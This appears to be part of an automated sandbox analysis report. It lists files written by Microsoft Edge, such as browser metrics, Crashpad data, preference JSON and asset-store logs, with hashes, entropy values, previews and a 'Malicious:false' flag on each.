                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                            Entropy (8bit):0.44463200331854225
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:ibsqmAG69qJlm0YkzY2jqBx/TvQ+CaHC:S9qJI0mr
                                                                                                                                                            MD5:EDBCA858956888AE0C86E63A01F5AAA8
                                                                                                                                                            SHA1:41ECEE0A358EEF75BBC28963778883640EE7D5C9
                                                                                                                                                            SHA-256:AEC0D9CED4F9780DA5395D4E5B9BE1CE8AB8EF87C6E16A969950B6F257D7521E
                                                                                                                                                            SHA-512:697CAEF83544718BADE07998076F64BD4630E9DD608ABFEFF90B2898C76AD14E8D36831032A93DF6CA31E3A375F7F69E763BD1F080A967B667AEAFFC151EFCD2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...@..@...@.....C.].....@...................(...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....m.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".eqswos20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U?:K...G..>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered....(..

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677C539A-1FBC.pma

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                            Entropy (8bit):0.04071709805136424
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:fw0EbtmqvDtKX7RJEa3XxxTxqZ/g+X0970R6EqhTS7N4nUg1gQLGjwvn8y08TcmQ:40EtGeK8YxFhAQ7gPEv08T2RGOD
                                                                                                                                                            MD5:1E75831DBBCB99928730282FF484108C
                                                                                                                                                            SHA1:13DE0C51D33C7C73E691A32427BF50CB137C07D9
                                                                                                                                                            SHA-256:D500AB9E03294B0A9D6BA2F9594A09706BC11524783AF36DF64F9BDF404E2728
                                                                                                                                                            SHA-512:1074FF1A93743C31AF79BEFE4ECE36D6327A8DEB1721130993D11288821C6CCF5C69FA2A5FFBC8BADEAB3068D96F9D55E48A2B255A3CBFD652B18182CEC92A4A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...@..@...@.....C.].....@................b...Q..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".eqswos20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677C53A2-182C.pma

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                            Entropy (8bit):0.03989860985937406
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:0f0EbtmqvD3KX7LJEa3Xxx7uqZGXPtg34N+hHBNEynI1gQMSzoAYn8y08Tcm2RGY:Y0Et2e18xFhhBggez208T2RGOD
                                                                                                                                                            MD5:41F376267A72B3427BB5390B09E69642
                                                                                                                                                            SHA1:6566494448FC3DE8E473FBF63DCF2CD230EFF9F1
                                                                                                                                                            SHA-256:17BEDA8FF8FBA15D57099FEC77B544498E7AF17287650E2AD0BE83BC836D3C93
                                                                                                                                                            SHA-512:F3A687CBCC07ADBB9A98876BE07938F4836A21F1FC88E410607EB2D9C54F34C96CBCD7072B28A8958F01E7B0F8F1779EB4BA3F887345FA58632FC326EE6F27DF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...@..@...@.....C.].....@................`...O..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....}.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".eqswos20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...............................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16384
                                                                                                                                                            Entropy (8bit):0.3553968406659012
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:biUXhV0xosU8xCe+JKlkQuMRxCb8ZXfgYJ0IJpP0KLsyW1L7Fx6:bFRqxosU8xWMk8xVZ4YWI30otWn
                                                                                                                                                            MD5:CFAB81B800EDABACBF6CB61AA78D5258
                                                                                                                                                            SHA1:2730D4DA1BE7238D701DC84EB708A064B8D1CF27
                                                                                                                                                            SHA-256:452A5479B9A2E03612576C30D30E6F51F51274CD30EF576EA1E71D20C657376F
                                                                                                                                                            SHA-512:EC188B0EE4D3DAABC26799B34EE471BEE988BDD7CEB011ED7DF3D4CF26F98932BBBB4B70DC2B7FD4DF9A3981B3CE22F4B5BE4A0DB97514D526E521575EFB2EC6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...@.@...@..............@...................................`... ...i.y.........CrashpadMetrics.....i.y..Yd.h.......A.......e............,.........W.......................W....................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.UsedPct.......h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.........A............................E.[4.f..................E.[4.f.................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.Errors............i.y..Yd.........A..................._..-`....h-.....................h-....................Crashpad.HandlerLifetimeMilestone.......0...i.y.[".........................................i.y..Yd.@.......C...........................VM....],................WM....],................Stability.BrowserExitCodes...... ...i.y......VM....],........H...i.y.1U!S............................................................ ...i.y...0...WM....],........................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):280
                                                                                                                                                            Entropy (8bit):3.060980776278344
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:FiWWltl/9UgBVP/Sh/JzvLi2RRIxINXj1J1:o1//BVsJDG2Yq
                                                                                                                                                            MD5:74B32A83C9311607EB525C6E23854EE0
                                                                                                                                                            SHA1:C345A4A3BB52D7CD94EA63B75A424BE7B52CFCD2
                                                                                                                                                            SHA-256:06509A7E418D9CCE502E897EAEEE8C6E3DCB1D0622B421DD968AF3916A5BFF90
                                                                                                                                                            SHA-512:ADC193A89F0E476E7326B4EA0472814FE6DD0C16FC010AAF7B4CF78567D5DF6A1574C1CE99A63018AFE7E9AD68918147880621A3C00FAA7AD1014A0056B4B9C4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:sdPC......................5.y&.K.?....................................................................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................48ea0ba2-e9bb-4568-92cb-0f42a5c5d505............

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\197d65b5-613a-455c-b19d-e5c17ab15492.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):34462
                                                                                                                                                            Entropy (8bit):5.558701456590119
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:TOhlEhpWPdBfq38F1+UoAYDCx9Tuqh0VfUC9xbog/OV+F7Ilrw/pQDdKp3tuR:TOhlEhpWPdBfq3u1jaH1IO/pauty
                                                                                                                                                            MD5:742EA671A3705EE09904218D2E4B51E5
                                                                                                                                                            SHA1:644C10C785935458C159564C459337FD00D4FA61
                                                                                                                                                            SHA-256:FFB6E2457C6ED9863E641322222157EE85E10733CEE3F9FB49D4A7FB3C48298A
                                                                                                                                                            SHA-512:072316A3006CF08589F2475AF8B237ED6E0BDC838B1E949FA18213C58BB237F0D28A1A958FF6BB4DE4491A3629778B08242EB8B7FBD49EA4F549A09328D556C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380674698346217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380674698346217","location":5,"ma

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1c83f67e-fba5-4cec-8d0e-642d60ea19ff.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1e0760e1-9c6f-4abb-8882-90184f2ec887.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):39660
                                                                                                                                                            Entropy (8bit):5.5627188428776035
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:TOhlElj7pLGLhDpWPdBfN38F1+UoAYDCx9Tuqh0VfUC9xbog/OVCZ2F7Ilrw/pIv:TOhlElVchDpWPdBfN3u1javZ21IO/pS1
                                                                                                                                                            MD5:24D7D23FC23EBFC2F34ED294169B449B
                                                                                                                                                            SHA1:11F17CD09D189CFA68AD62FB10025EBD5D373892
                                                                                                                                                            SHA-256:7436F648B2CCF4344EB0F93D72F7DD8FC0DE9E7C33BE5F8F6D0870F2B147F2AB
                                                                                                                                                            SHA-512:CA878F2E71B9DEAA58B4DD9FE0F3FCCE99D91A041D16B65FA39285FE902A9A5E4E1108C87AB2ED209AD2DCBCFDFA7B2CD3EB0777758B5145077E70D9214173A2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380674698346217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380674698346217","location":5,"ma

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\23fbb557-cb19-45de-8b21-9fb4ea0598dd.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):37817
                                                                                                                                                            Entropy (8bit):5.556328312474803
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:TOhlElj7pLGLhDpWPdBfN38F1+UoAYDCx9Tuqh0VfUC9xbog/OV+F7Ilrw/pfDdF:TOhlElVchDpWPdBfN3u1jaH1IO/pZutc
                                                                                                                                                            MD5:C20FCC20FB4DF6A034F4ED9236E52032
                                                                                                                                                            SHA1:7BC6C4212679FA1B40EB02D5CBA5F766015C8968
                                                                                                                                                            SHA-256:3EA3D223977DF147EB678548C7739A02F529061A1B40E60FE6BECFBF68E21B25
                                                                                                                                                            SHA-512:7755F608AD676DC59E8E02DBA92D5009F23B76DEF60637C2E0AA818E1637B552EEAF28928A6CBA6068FF502E389603D714739FD9EAB03CF5E59E39EBD39DA8F2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380674698346217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380674698346217","location":5,"ma

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3b94ca6a-9c60-42d8-8232-62955931f6f2.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (17481), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):17483
                                                                                                                                                            Entropy (8bit):5.415698847941595
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:sVmoJ9pQTryZiuaba4uypnNJk3ScYjY5pEwqi5WcHbbK8Gpj+FeJYQwHt+dl1f:sV7LAJu4NJk3A3yWeepUjQwYx
                                                                                                                                                            MD5:42FF8251BACE1C5EB50B4A414D33BEDA
                                                                                                                                                            SHA1:C6999A1FD128DED61FA7371C6BD1C0CA28B8AE72
                                                                                                                                                            SHA-256:AAFAAA60DC936955F4B45DB2BE6B9F2518A2EF6558CCF5994A0FBB4DBFDFB482
                                                                                                                                                            SHA-512:51446359DE6387ECAB6EFB2882A07EA69250A7B3D03733E86A008D6D0BC8E711ADAD69E7AADB93F3EBDE3EA30E212AAC2DB65A83BE171F9B3F92770FFF73F970
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380674698994767","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\52fb940f-707d-4d63-ba8d-d4a77c014ca4.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13725
                                                                                                                                                            Entropy (8bit):5.124100185492223
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:sVmoJ9pQTryZiuaba4uypnNJk3aYjY5pOK8Gpj+FeJYQwHt+dl1f:sV7LAJu4NJk3QpUjQwYx
                                                                                                                                                            MD5:6E4F6A1DDC38A73B9B1DFCFFFEC345B4
                                                                                                                                                            SHA1:09FBA3C675A4CE417EF7CD3C89781014B57A6A3A
                                                                                                                                                            SHA-256:61B76C4721C16712EBF4B3CC3D5546D72A7B9E534B64DEF96CEF5D3AFE3023F0
                                                                                                                                                            SHA-512:D4E2897ED81412C153E92FDDE4C7C65CE3312FE88A36945A3966FEFCF292D78CEA5527BF26CD8F76592D395927A016A2B385B4E5F012374B92CB39381D6937B3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380674698994767","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5630c51c-aedd-45c9-a0d0-16c06b5aa030.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6fae9e1a-e856-4901-930d-d7b163b34c38.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (18136), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):18138
                                                                                                                                                            Entropy (8bit):5.4572041692844735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:sVmoJ9pQTryZiuaba4uypnNJk3SewAYjY5pEwqi5WcHbbK8Gpj+FeJYQwHtv5dld:sV7LAJu4NJk3nu3yWeepUjQwV5x
                                                                                                                                                            MD5:FE917CF7C5E1D4DEA18709399E3F3EF6
                                                                                                                                                            SHA1:42BCA12E8CF54047DACE71E40273D8CB1C36274F
                                                                                                                                                            SHA-256:8BE360E5A6546A067CF650BD8C9C7FEC1CD1FBD455C341227A9C58F8B265F5AF
                                                                                                                                                            SHA-512:91465820F2DFAD61C73D78F4F39BF37057F88043FB2989022CBF5E102394DB65CCD4EDD18F039C0F077A8223C5E4067B9A6CBCD12CC381E24C8CE47860DC8D68
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380674698994767","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000001.dbtmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):1695826
                                                                                                                                                            Entropy (8bit):5.041128864719659
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:5PfQUg6kAdRhiGzmYoAo2ENU0ifYeV3br2M:5PfZ/mS5
                                                                                                                                                            MD5:D7837E6409284D571B36153D0CE15847
                                                                                                                                                            SHA1:64439C13C1E19D767B8A6199E331E295EB613E5D
                                                                                                                                                            SHA-256:B3BDBD238DC1699BBC607785699B1234D80117ADF92D7F2AF8B2EC579BA4C344
                                                                                                                                                            SHA-512:3802227F53F62BFA71C81A037E7EEF96AD3188DF9F4432822E76C6A60BEEF1D53905F616E9A929BA0E5E1087F6E23795FE95C874EF4A4DFFA77C8EF4DF1B898E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...m.................DB_VERSION.1...P.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13380674704087243.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}].v._.................QUERY_TIMESTAMP:edge_hub_apps_manifest_gz4.7.*.13380674704108410.$QUERY:edge_hub_apps_manifest_gz4.7.*..[{"name":"edge_hub_apps_manifest_gz","url":"https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline","version":{"major":4,"minor":7,"patch":107},"hash":"Qoxdh2pZS19o99emYo77uFsfzxtXVDB75kV6eln53YE=","size":1682291}]=_.../..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivileged

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\CURRENT (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):293
                                                                                                                                                            Entropy (8bit):5.098233835674233
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/pvu1wkn23oH+Tcwt9Eh1ZB2KLl9pr4N+q2Pwkn23oH+Tcwt9Eh1tIFUv:7/pv5fYeb9Eh1ZFLzpFvYfYeb9Eh16F2
                                                                                                                                                            MD5:B81D3419CE4A6B652E458B82319EFDDB
                                                                                                                                                            SHA1:BAE6961DBD442D0E7FA6AEACE4BDE59465134293
                                                                                                                                                            SHA-256:BB9FC1D1481C79BDADB35F503193CCB63BE29552F70CE230E9F087E56B6E08C7
